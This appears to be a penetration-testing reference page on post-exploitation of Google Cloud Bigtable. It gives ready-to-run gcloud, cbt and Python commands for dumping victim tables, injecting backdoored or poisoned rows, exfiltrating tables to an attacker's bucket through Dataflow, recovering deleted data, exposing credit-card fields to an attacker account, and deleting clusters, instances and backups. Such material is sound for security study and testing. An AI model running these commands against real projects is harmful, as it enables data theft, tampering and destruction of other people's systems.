GCP - Bigtable Post Exploitation


Bigtable

For more information about Bigtable check:

GCP - Bigtable Enum

Tip

Install the cbt CLI once via the Cloud SDK so the commands below work locally:

Install cbt CLI
gcloud components install cbt

Read rows

Permissions: bigtable.tables.readRows

cbt ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.

Read Bigtable entries
# Install cbt
gcloud components update
gcloud components install cbt

# Read entries using the credentials gcloud is configured with
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
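
To keep the dump small and quiet, cbt's read filters (count=, prefix=, start=/end=) let you sample instead of scanning everything. A quick sketch with placeholder values:

Limit the scan
# Peek at the first 10 rows only
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> count=10

# Or scan only a row-key prefix
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> prefix=user# count=50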

Write rows

Permissions: bigtable.tables.mutateRows (plus bigtable.tables.readRows to confirm the change).

Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.

Inject malicious row
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>

cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin

# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> prefix=user#1337

cbt set accepts raw bytes via the @/path syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
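
If you'd rather avoid the CLI's value parsing entirely, a minimal Python sketch using the official google-cloud-bigtable client writes arbitrary bytes straight into a cell (the payload path, row key and column names below are placeholders):

Write raw bytes with the Python client
from google.cloud import bigtable

# Uses whatever credentials gcloud/ADC already provides
client = bigtable.Client(project="<victim-proj>")
table = client.instance("<instance-id>").table("<table-id>")

with open("/tmp/payload.bin", "rb") as f:  # hypothetical payload file
    payload = f.read()

row = table.direct_row(b"user#1337")
row.set_cell("secrets", b"api_key", payload)  # raw bytes, no shell escaping involved
row.commit()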

Dump rows to your bucket

Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs

It’s possible to exfiltrate the contents of an entire table by launching a Dataflow job that streams its rows into a GCS bucket you control.

Note

Note that you will need the permission iam.serviceAccounts.actAs over some SA with enough permissions to perform the export (by default, if not indicated otherwise, the default compute SA is used).

Export Bigtable to GCS bucket
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
  --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run dump-bigtable3 \
  --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
  --project=gcp-labs-3uis1xlx \
  --region=us-central1 \
  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
  --staging-location=gs://deleteme20u9843rhfioue/staging/

Note

Switch the template to Cloud_Bigtable_to_GCS_Parquet or Cloud_Bigtable_to_GCS_SequenceFile if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
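
If the default compute SA lacks the required Bigtable/GCS permissions, you can run the job as any other SA you hold iam.serviceAccounts.actAs over by adding gcloud's --service-account-email flag, roughly as sketched below (the SA email is a placeholder). The same flag works for the import job in the next section.

Run the Dataflow job as a specific SA
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --service-account-email=<SA_EMAIL> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
  --staging-location=gs://<BUCKET>/staging/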

Import rows

Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs

It’s possible to import arbitrary rows into a table by launching a Dataflow job that streams data from a GCS bucket you control into Bigtable. For this the attacker first needs a Parquet file containing the data to import in the expected schema. One way to get it is to export the table in Parquet format using the previous technique with the Cloud_Bigtable_to_GCS_Parquet template, download the file, and add new entries to it, as shown in the sketch below.
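
A minimal sketch of that tampering step, assuming pandas/pyarrow are available and cloning an existing row so the layout produced by the export template stays valid (file names are placeholders):

Append rows to the exported Parquet file
import pandas as pd  # requires pandas + pyarrow

df = pd.read_parquet("parquet_prefx-00000-of-00001.parquet")
print(df.dtypes)  # inspect the schema written by Cloud_Bigtable_to_GCS_Parquet

poisoned = df.iloc[[0]].copy()  # clone an existing row so the schema stays valid
# ...edit the cloned row's key/cell values here with whatever you want to inject...

pd.concat([df, poisoned], ignore_index=True).to_parquet("bigtable_import.parquet", index=False)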

Note

Note that you will need the permission iam.serviceAccounts.actAs over some SA with enough permissions to perform the import (by default, if not indicated otherwise, the default compute SA is used).

Import from GCS bucket to Bigtable
gcloud dataflow jobs run import-bt-$(date +%s) \
  --region=<REGION> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/GCS_Parquet_to_Cloud_Bigtable \
  --project=<PROJECT> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
  --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
  --region=us-central1 \
  --gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
  --project=gcp-labs-3uis1xlx \
  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
  --staging-location=gs://deleteme20u9843rhfioue/staging/

Restoring backups

Permissions: bigtable.backups.restore, bigtable.tables.create.

An attacker with these permissions can restore a backup into a new table under their control in order to recover old sensitive data.

Restore Bigtable backup
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
  --cluster=<CLUSTER_ID_SOURCE>

gcloud bigtable instances tables restore \
    --source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
    --async \
    --destination=<TABLE_ID_NEW> \
    --destination-instance=<INSTANCE_ID_DESTINATION> \
    --project=<PROJECT_ID_DESTINATION>
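
Once the restore job finishes, the recovered table can be dumped with cbt like any other table (reusing the placeholders above):

Read the restored table
cbt -project=<PROJECT_ID_DESTINATION> -instance=<INSTANCE_ID_DESTINATION> read <TABLE_ID_NEW> count=10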

Undelete tables

Permissions: bigtable.tables.undelete

Bigtable supports soft-deletion with a grace period (7 days by default). During this window, an attacker with the bigtable.tables.undelete permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.

This is particularly useful for:

  • Recovering data from tables deleted by defenders during incident response
  • Accessing historical data that was intentionally purged
  • Reversing accidental or malicious deletions to maintain persistence
Undelete Bigtable table
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
  --show-deleted

# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
  --instance=<instance-id>

Note

The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.

Create Authorized Views

Permissions: bigtable.authorizedViews.create, bigtable.tables.readRows, bigtable.tables.mutateRows

Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish exactly the sensitive column/row sets you care about and whitelist your own principal.

Warning

To create an authorized view you also need to be able to read and mutate rows in the base table, so you are not gaining any extra access; this technique is therefore mostly useless.

Create authorized view
cat <<'EOF' > /tmp/credit-cards.json
{
  "subsetView": {
    "rowPrefixes": ["acct#"],
    "familySubsets": {
      "pii": {
        "qualifiers": ["cc_number", "cc_cvv"]
      }
    }
  }
}
EOF

gcloud bigtable authorized-views create card-dump \
  --instance=<instance-id> --table=<table-id> \
  --definition-file=/tmp/credit-cards.json

gcloud bigtable authorized-views add-iam-policy-binding card-dump \
  --instance=<instance-id> --table=<table-id> \
  --member='user:<attacker@example.com>' --role='roles/bigtable.reader'

Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.

Read Authorized Views

Permissions: bigtable.authorizedViews.readRows

If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will probably limit what you can access from the table. Below is an example using Python:

Read from authorized view (Python)
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest

# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"

# The data client picks up the default gcloud/ADC credentials; no admin client is needed
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"

request = ReadRowsRequest(
    authorized_view_name=authorized_view_name
)

rows = data_client.read_rows(request=request)
for response in rows:
    for chunk in response.chunks:
        if chunk.row_key:
            row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
            print(f"Row: {row_key}")
        if chunk.family_name:
            family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
            qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
            value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
            print(f"  {family}:{qualifier} = {value}")

Denial of Service via Delete Operations

Permissions: bigtable.appProfiles.delete, bigtable.authorizedViews.delete, bigtable.authorizedViews.deleteTagBinding, bigtable.backups.delete, bigtable.clusters.delete, bigtable.instances.delete, bigtable.tables.delete

Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:

  • bigtable.appProfiles.delete: Delete application profiles, breaking client connections and routing configurations
  • bigtable.authorizedViews.delete: Remove authorized views, cutting off legitimate access paths for applications
  • bigtable.authorizedViews.deleteTagBinding: Remove tag bindings from authorized views
  • bigtable.backups.delete: Destroy backup snapshots, eliminating disaster recovery options
  • bigtable.clusters.delete: Delete entire clusters, causing immediate data unavailability
  • bigtable.instances.delete: Remove complete Bigtable instances, wiping out all tables and configurations
  • bigtable.tables.delete: Delete individual tables, causing data loss and application failures
Delete Bigtable resources
# Delete a table
gcloud bigtable instances tables delete <table-id> \
  --instance=<instance-id>

# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
  --instance=<instance-id> --table=<table-id>

# Delete a backup
gcloud bigtable backups delete <backup-id> \
  --instance=<instance-id> --cluster=<cluster-id>

# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
  --instance=<instance-id>

# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
  --instance=<instance-id>

# Delete an entire instance
gcloud bigtable instances delete <instance-id>

Warning

Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.
